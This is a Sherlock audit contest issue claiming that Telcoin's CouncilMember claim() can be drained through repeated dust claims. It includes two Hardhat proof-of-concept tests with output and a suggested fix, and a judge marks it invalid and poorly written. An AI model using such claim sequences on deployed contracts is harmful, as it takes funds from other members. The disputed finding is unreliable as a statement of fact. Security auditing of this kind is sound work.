sherlock-audit / 2024-01-telcoin-judging


CL001 - TELCOIN can be drained if members claim() dust amount #137

Closed sherlock-admin2 closed 9 months ago

sherlock-admin2 commented 9 months ago

CL001

high

TELCOIN can be drained if members claim() dust amount

Summary

TELCOIN can be drained because the claim() method allows the withdrawal of the dust balance.

Vulnerability Detail

poc 1

```javascript
// Hardhat/Chai test. `councilMember`, `telcoin`, `member` and `support` are
// assumed to come from the surrounding test file's fixture setup.
describe("my poc", () => {
    it("test claim", async () => {
        // Mint two council NFTs so the stream is shared between two members
        await expect(councilMember.mint(member.address)).to.not.be.reverted;
        await expect(councilMember.mint(support.address)).to.not.be.reverted;

        // PoC 1: claim a zero amount 100 times, then claim 5000 in one go
        for (let i = 0; i < 100; i++) {
            await expect(councilMember.connect(member).claim(0, 0)).to.not.be.reverted;
        }
        await expect(councilMember.connect(member).claim(0, 5000)).to.not.be.reverted;

        // Compare the member's balance with what is left in the contract
        console.log("memeber telcoin balance:", await telcoin.balanceOf(member.address));
        console.log(await telcoin.balanceOf(await councilMember.getAddress()));
    });
});
```

Output:

```text
      my poc
memeber telcoin balance: 5000n
5200n
```

poc 2

```javascript
// Hardhat/Chai test. `councilMember`, `telcoin`, `member` and `support` are
// assumed to come from the surrounding test file's fixture setup.
describe("my poc", () => {
    it("test claim", async () => {
        // Mint two council NFTs so the stream is shared between two members
        await expect(councilMember.mint(member.address)).to.not.be.reverted;
        await expect(councilMember.mint(support.address)).to.not.be.reverted;

        // PoC 2: claim a dust amount (20) 500 times in a row
        for (let i = 0; i < 500; i++) {
            await expect(councilMember.connect(member).claim(0, 20)).to.not.be.reverted;
        }

        // Compare the member's balance with what is left in the contract
        console.log("memeber telcoin balance:", await telcoin.balanceOf(member.address));
        console.log(await telcoin.balanceOf(await councilMember.getAddress()));
    });
});
```

Output:

```text
      my poc
memeber telcoin balance: 10000n
40100n
```

Impact

Because a council member can get more than their share for free, TELCOIN can be drained.

Code Snippet

https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L92

https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L267

Tool used

Manual Review

Recommendation

Redesign the claim() method and the _retrieve() method, tracking the amount that has been claimed by members, or limit the use of the _retrieve() method.

Duplicate of #23

sherlock-admin2 commented 9 months ago

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid because { there is no clear impact mentioned and the report is poorly written}